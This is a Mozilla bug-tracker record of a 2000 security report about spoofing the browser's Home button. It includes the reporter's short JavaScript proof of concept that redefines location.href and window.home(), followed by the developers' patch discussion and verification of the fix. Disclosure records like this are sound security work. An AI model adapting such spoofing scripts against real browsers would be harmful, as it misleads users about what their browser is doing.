Closed
Bug 44014
Opened 24 years ago
Closed 24 years ago
spoofing user's "Home"
Categories
(Core :: Security, defect, P2)
Core
Security
Tracking
()
VERIFIED
FIXED
mozilla0.9.1
People
(Reporter: security-bugs, Assigned: security-bugs)
References
Details
(Whiteboard: [need reviews])
Attachments
(1 file)
1.75 KB,
patch
|
Details | Diff | Splinter Review |
Date:
Mon, 26 Jun 2000 16:48:03 +0300
From:
Georgi Guninski <joro@nat.bg>
To:
Mitchell Stoltz <mstoltz@netscape.com>
It is possible to change the behavior of clicking the "Home" button or
choosing "Go|Home" from the menu.
The exploit uses __defineGetter__ and redefinion of window.home().
I think that allowing redefinition of predefined functions is not a good
idea.
The code is:
---------------------------------------
Press the "Home" button or choose "Go|Home" in the other window in 2
seconds.
<SCRIPT>
a=window.open("about:blank","a");
function f()
{
a.location.__defineGetter__("href",function() {return
"http://www.yahoo.com"});
a.window.home=new Function("this.document.body.innerHTML='Spoofed'");
a.window.home();
}
setTimeout("f()",2000);
</SCRIPT>
---------------------------------------
Assignee | ||
Comment 1•24 years ago
|
||
This testcase does not behave as described, but the vulnerabilities mentioned
should be addressed.
Assignee | ||
Updated•24 years ago
|
Status: NEW → ASSIGNED
Assignee | ||
Comment 2•24 years ago
|
||
Can't duplicate this exploit, marking M18 for post-Beta2. Re-address this exploit
and look at the issue of redefining properties.
Target Milestone: --- → M18
Assignee | ||
Comment 3•24 years ago
|
||
Fixing 36946 by marking key properties as PERMANENT will fix this too. As for
__defineGetter__, this should be fixed now, i think.
Depends on: 36946
Assignee | ||
Comment 4•24 years ago
|
||
I think this no longer works, marking nsbeta3 to remind myself to look at it.
Keywords: nsbeta3
Priority: P3 → P2
Assignee | ||
Comment 5•24 years ago
|
||
Nominating for RTM, and I have opened bug 54976 on the __defineGetter__ aspect
of this bug. Patrick, can you give me a + ?
Keywords: rtm
Assignee | ||
Comment 6•24 years ago
|
||
Assignee | ||
Comment 7•24 years ago
|
||
I've posted jst's patch which adds JSPROP_PERMANENT to the location property.
This dosn't completely fix the problem. Looks like we have to protect
location.href as well.
Comment 8•24 years ago
|
||
Mitch, are you happy with the patch in this bug? Can it go to reviews? (Is it
OK to strcmp against "LOCATION" vs "location" or using strcasecmp?) The fix is
reasonably small. If you think it's correct, it _might_ get approved for RTM...
Whiteboard: [need reviews]
Assignee | ||
Comment 9•24 years ago
|
||
This patch is not a complete fix. We need to restrict "location.href" as well.
I'll see about getting this done.
Updated•24 years ago
|
QA Contact: czhang → junruh
Assignee | ||
Comment 10•24 years ago
|
||
Future, since the fix is not ready yet.
Target Milestone: M18 → Future
Assignee | ||
Comment 11•24 years ago
|
||
removing rtm.
Assignee | ||
Comment 13•24 years ago
|
||
Mass changing milestones to Moz0.9.1. Many of these bugs are dependent on the
XPConnected DOM and its associated security UI changes.
Target Milestone: Future → mozilla0.9.1
Assignee | ||
Comment 14•24 years ago
|
||
Georgi thinks this is no longer an issue. You can still redefine window.home()
but this doesn't change the behavior of the Home button anymore. There are a few
other bugs dealing with redefining built-in proerties, but that's covered
elsewhere, so I'm closing this one.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Comment 15•24 years ago
|
||
Marking VERIFIED FIXED per originator on:
-MacOS91 2001-05-21-15-trunk
-Win98SE 2001-05-22-06-trunk
-LinRH62 2001-05-22-05-trunk
Status: RESOLVED → VERIFIED
You need to log in
before you can comment on or make changes to this bug.
Description
•